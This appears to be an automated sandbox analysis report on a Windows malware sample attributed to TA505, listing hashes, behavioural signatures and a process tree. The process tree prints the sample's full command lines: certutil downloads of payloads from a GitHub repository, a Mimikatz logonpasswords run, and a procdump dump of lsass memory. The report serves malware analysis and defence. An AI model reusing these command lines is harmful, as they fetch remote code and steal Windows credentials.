ta505 | df9018383b6488d0c89bbf7063bd1143877ec6f99abf55b1c6846457baa7e080

Resubmissions

13-12-2023 16:00

231213-tfqc8sgdh6 10

13-12-2023 15:46

231213-s7452agch8 10

Analysis

max time kernel
32s
max time network
36s
platform
windows7_x64
resource
win7-20231023-en
resource tags

arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system
submitted
13-12-2023 15:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe
Size

3.9MB
MD5

37130df0dc6057afaf677c2907eebdb4
SHA1

75caff36d1115049d605f91a651bf0f8479118cc
SHA256

08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c
SHA512

357185b2e36508485329a13792a9741ea5040db09b482e6ce10a67581f982883df79b0367a53bb8fcc2574fcdf2dddb97ced0303dfd72a1ee670182bf8001274
SSDEEP

49152:WYS35HobXrb/TavO90dL3BmAFd4A64nsfJoJLNXdCVpo/MFKQm8cjdFiMLz4zy4y:WYCobCJZ0S5Qmxvl4fEwe8xj/E

Score

10^/10

ta505

Malware Config

Signatures

TA505
Cybercrime group active since 2015, responsible for families like Dridex and Locky.
ta505
Downloads MZ/PE file

Executes dropped EXE 2 IoCs

pid	Process
2128	procdump.exe
592	procdump64.exe

Loads dropped DLL 1 IoCs

pid	Process
2128	procdump.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2128	procdump.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
2128	procdump.exe
2128	procdump.exe
592	procdump64.exe
592	procdump64.exe
592	procdump64.exe
592	procdump64.exe
592	procdump64.exe
592	procdump64.exe
592	procdump64.exe
592	procdump64.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2128	procdump.exe
Token: SeDebugPrivilege	592	procdump64.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1884	calc.exe

Suspicious use of WriteProcessMemory 47 IoCs

description	pid	Process	procid_target
PID 2968 wrote to memory of 2700	2968	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	29
PID 2968 wrote to memory of 2700	2968	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	29
PID 2968 wrote to memory of 2700	2968	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	29
PID 2700 wrote to memory of 2716	2700	cmd.exe	30
PID 2700 wrote to memory of 2716	2700	cmd.exe	30
PID 2700 wrote to memory of 2716	2700	cmd.exe	30
PID 2968 wrote to memory of 2664	2968	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	31
PID 2968 wrote to memory of 2664	2968	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	31
PID 2968 wrote to memory of 2664	2968	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	31
PID 2664 wrote to memory of 2692	2664	cmd.exe	32
PID 2664 wrote to memory of 2692	2664	cmd.exe	32
PID 2664 wrote to memory of 2692	2664	cmd.exe	32
PID 2968 wrote to memory of 2684	2968	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	33
PID 2968 wrote to memory of 2684	2968	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	33
PID 2968 wrote to memory of 2684	2968	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	33
PID 2684 wrote to memory of 2688	2684	cmd.exe	34
PID 2684 wrote to memory of 2688	2684	cmd.exe	34
PID 2684 wrote to memory of 2688	2684	cmd.exe	34
PID 2968 wrote to memory of 2916	2968	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	35
PID 2968 wrote to memory of 2916	2968	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	35
PID 2968 wrote to memory of 2916	2968	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	35
PID 2968 wrote to memory of 2632	2968	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	36
PID 2968 wrote to memory of 2632	2968	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	36
PID 2968 wrote to memory of 2632	2968	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	36
PID 2632 wrote to memory of 2540	2632	cmd.exe	37
PID 2632 wrote to memory of 2540	2632	cmd.exe	37
PID 2632 wrote to memory of 2540	2632	cmd.exe	37
PID 2968 wrote to memory of 2328	2968	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	38
PID 2968 wrote to memory of 2328	2968	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	38
PID 2968 wrote to memory of 2328	2968	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	38
PID 2328 wrote to memory of 2128	2328	cmd.exe	39
PID 2328 wrote to memory of 2128	2328	cmd.exe	39
PID 2328 wrote to memory of 2128	2328	cmd.exe	39
PID 2328 wrote to memory of 2128	2328	cmd.exe	39
PID 2968 wrote to memory of 604	2968	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	41
PID 2968 wrote to memory of 604	2968	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	41
PID 2968 wrote to memory of 604	2968	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	41
PID 604 wrote to memory of 696	604	cmd.exe	42
PID 604 wrote to memory of 696	604	cmd.exe	42
PID 604 wrote to memory of 696	604	cmd.exe	42
PID 2128 wrote to memory of 592	2128	procdump.exe	43
PID 2128 wrote to memory of 592	2128	procdump.exe	43
PID 2128 wrote to memory of 592	2128	procdump.exe	43
PID 2128 wrote to memory of 592	2128	procdump.exe	43
PID 2968 wrote to memory of 2456	2968	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	44
PID 2968 wrote to memory of 2456	2968	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	44
PID 2968 wrote to memory of 2456	2968	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	44

C:\Users\Admin\AppData\Local\Temp\08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe
"C:\Users\Admin\AppData\Local\Temp\08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2968
- C:\Windows\system32\cmd.exe
  cmd /c "certutil -urlcache -split -f https://raw.githubusercontent.com/inwestallis/first_repository/master/mim.b mim.b"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2700
- - C:\Windows\system32\certutil.exe
    certutil -urlcache -split -f https://raw.githubusercontent.com/inwestallis/first_repository/master/mim.b mim.b
    3⤵
    PID:2716
- C:\Windows\system32\cmd.exe
  cmd /c "certutil -decode mim.b mim"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2664
- - C:\Windows\system32\certutil.exe
    certutil -decode mim.b mim
    3⤵
    PID:2692
- C:\Windows\system32\cmd.exe
  cmd /c "expand mim mimi.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2684
- - C:\Windows\system32\expand.exe
    expand mim mimi.exe
    3⤵
    PID:2688
- C:\Windows\system32\cmd.exe
  cmd /c "start mimi.exe" log privilege::debug sekurlsa::logonpasswords
  2⤵
  PID:2916
- C:\Windows\system32\cmd.exe
  cmd /c "certutil -urlcache -split -f http://live.sysinternals.com/procdump.exe procdump.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2632
- - C:\Windows\system32\certutil.exe
    certutil -urlcache -split -f http://live.sysinternals.com/procdump.exe procdump.exe
    3⤵
    PID:2540
- C:\Windows\system32\cmd.exe
  cmd /c "start procdump.exe -accepteula -ma lsass.exe lsass.dmp"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2328
- - C:\Users\Admin\AppData\Local\Temp\procdump.exe
    procdump.exe -accepteula -ma lsass.exe lsass.dmp
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2128
  - - C:\Users\Admin\AppData\Local\Temp\procdump64.exe
      procdump.exe -accepteula -ma lsass.exe lsass.dmp
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:592
- C:\Windows\system32\cmd.exe
  cmd /c "certutil -urlcache -split -f https://github.com/inwestallis/first_repository/raw/master/gg.lnk gg.lnk"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:604
- - C:\Windows\system32\certutil.exe
    certutil -urlcache -split -f https://github.com/inwestallis/first_repository/raw/master/gg.lnk gg.lnk
    3⤵
    PID:696
- C:\Windows\system32\cmd.exe
  cmd /c "start gg.lnk"
  2⤵
  PID:2456

C:\Windows\system32\calc.exe
"C:\Windows\system32\calc.exe"
1⤵
- Suspicious use of FindShellTrayWindow
PID:1884

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
48f3089b8a03811190d556ce02e956d9

SHA1
f8ed2a87f23141c6121609767f3ddf7e9f0189e8

SHA256
75c08f7e55e82d64b6f58587fac633eeb9a44ccfbae2af923f67734bb87a1f21

SHA512
71ba1fc6c04d232096acb199a8d4f8543502505fa192e73381c419b867c7a92a3270e9de9ac73177ee6002f7bf8dc5d441b8eaefca3669f519f0d5f2c8c049cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab83F0.tmp

Filesize
61KB

MD5
f3441b8572aae8801c04f3060b550443

SHA1
4ef0a35436125d6821831ef36c28ffaf196cda15

SHA256
6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

SHA512
5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\gg.lnk

Filesize
220KB

MD5
e7c89ea9a54473f7bd0a1f361ea3905b

SHA1
432c62f3c2235044b67c24708012ea4e88a7bf0c

SHA256
4a1eb2061d478d6e818ac138d385fe6b3a573ce1a3dc981f7426e4e602bd8aba

SHA512
6c0364fdf5b7f347345c36d859c62a46d236deaa4b8c3af252cef47741d04bbd77b49e6d1a010b03b3b5ec87be1b85d8748594d151eb4a435d8031b0092f8aca

Download Submit
C:\Users\Admin\AppData\Local\Temp\mim.b

Filesize
14B

MD5
3be7b8b182ccd96e48989b4e57311193

SHA1
78fb38f212fa49029aff24c669a39648d9b4e68b

SHA256
d5558cd419c8d46bdc958064cb97f963d1ea793866414c025906ec15033512ed

SHA512
f3781cbb4e9e190df38c3fe7fa80ba69bf6f9dbafb158e0426dd4604f2f1ba794450679005a38d0f9f1dad0696e2f22b8b086b2d7d08a0f99bb4fd3b0f7ed5d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\procdump.exe

Filesize
773KB

MD5
f2091c44d89789f689d98bc244358878

SHA1
db1ef4ce56820c93a3b7f1fdf36d3fffc7d1ec96

SHA256
e4ea34a7c2b51982a6c42c6367119f34bec9aeb9a60937836540035583a5b3bc

SHA512
95fea3d3e28ac1b67bc7d5996d9af81da31f867bc47c27a0b1a3bed42d2c5347e4746a2a83d435176c6b483a2e387a8fa5fec80bcf745ec5b250ac6d646dfae5

Download Submit
\Users\Admin\AppData\Local\Temp\procdump64.exe

Filesize
414KB

MD5
68a1f7c796de1d0df6b2d78e182df3a0

SHA1
43e3521e0403636150ac0c6c4da6a536f0ab504f

SHA256
5b165b01f9a1395cae79e0f85b7a1c10dc089340cf4e7be48813ac2f8686ed61

SHA512
616f2f165c8a32eca18a9f2ef14325c1d89c1ae97efd8c89eaa9adc9f527b940700a5c9ede93ae2218e0b58553a23effc6a4e48b8498eb83cfc723cbcf241d01

Download Submit
memory/2456-70-0x0000000002560000-0x0000000002561000-memory.dmp

Filesize
4KB

Download